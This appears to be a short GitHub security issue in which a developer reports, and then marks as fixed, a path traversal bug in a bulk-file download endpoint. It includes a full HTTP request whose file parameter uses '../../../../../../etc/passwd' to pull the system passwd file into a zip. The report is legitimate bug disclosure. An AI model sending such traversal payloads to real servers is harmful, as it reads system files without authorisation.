[Security Issue] Path Traversal #2

Question

[Security Issue] Path Traversal #2

patrickhener opened this issue 4 years ago · 1 comments

Oh now :( 🤦

GET /cf985bddf28fed5d5c53b069d6a6ebe601088ca6e20ec5a5a8438f8e1ffd9390/bulk-file?file=%252Fgo.mod&file=%252Fgo.sum&file=../../../../../../etc/passwd HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/
Upgrade-Insecure-Requests: 1

This will happily give you the passwd in the zip file. Once again need to sanitize path

patrickhener commented 4 years ago

Fixed